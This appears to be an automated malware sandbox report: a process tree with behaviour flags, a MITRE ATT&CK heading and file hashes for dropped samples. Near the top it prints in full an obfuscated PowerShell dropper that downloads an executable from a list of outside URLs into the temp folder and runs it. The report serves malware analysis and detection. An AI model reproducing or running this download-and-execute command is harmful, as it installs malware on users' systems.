C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$rNR='wBt';$ljt=new-object Net.WebClient;$Lzj='http://alistairmccoy.co.uk/0R@http://erinkveld.eu/tKlZyU@http://dentaware.com/PbF@http://havmore.in/UXxra@http://aphn.org/zTADPIb'.Split('@');$saK='RnK';$Daw = '38';$EdX='ETL';$NPu=$env:temp+'\'+$Daw+'.exe';foreach($ljP in $Lzj){try{$ljt.DownloadFile($ljP, $NPu);$zsO='HFA';If ((Get-Item $NPu).length -ge 80000) {Invoke-Item $NPu;$TVX='jJJ';break;}}catch{}}$GSL='zja';"4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Users\Admin\AppData\Local\Temp\38.exe"C:\Users\Admin\AppData\Local\Temp\38.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\38.exe"C:\Users\Admin\AppData\Local\Temp\38.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2580
-
C:\Windows\SysWOW64\balloonclear.exe"C:\Windows\SysWOW64\balloonclear.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\SysWOW64\balloonclear.exe"C:\Windows\SysWOW64\balloonclear.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2620
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD53bd9b9430dd7737caafe94e39dae56fb
SHA153de0fd722c99ad95a06c21cb66623797e91f161
SHA25676aafdaafd9ef54624a6f8fc39f8f1d71af1461ad5cc992f608c18a0e7771cd6
SHA512fef9eb0105441d87d738c0d09985b6f372f028fa56c8309de608366db26ee79f8ce006d589b91ca5ee0220e32789c51f6ff5c36b31eb63ba9bd0e7bd3c427497
-
Filesize
376KB
MD5ac4ad219921aa13ac020f5dc460ad503
SHA1df3cadeb2736d3df7a31c6c9d3dad122d9570e16
SHA2564a417963968601bbe8f9311d779d1a022a380829bed4b7af4daf934eeba5c70f
SHA5122df686213ea67e030440deb61fed6559f721b0b6bf973915c7509b1cc15896669ffab5061cfc1674d358c819e69756276a0e8180e65ee47855d4b5ab882676fb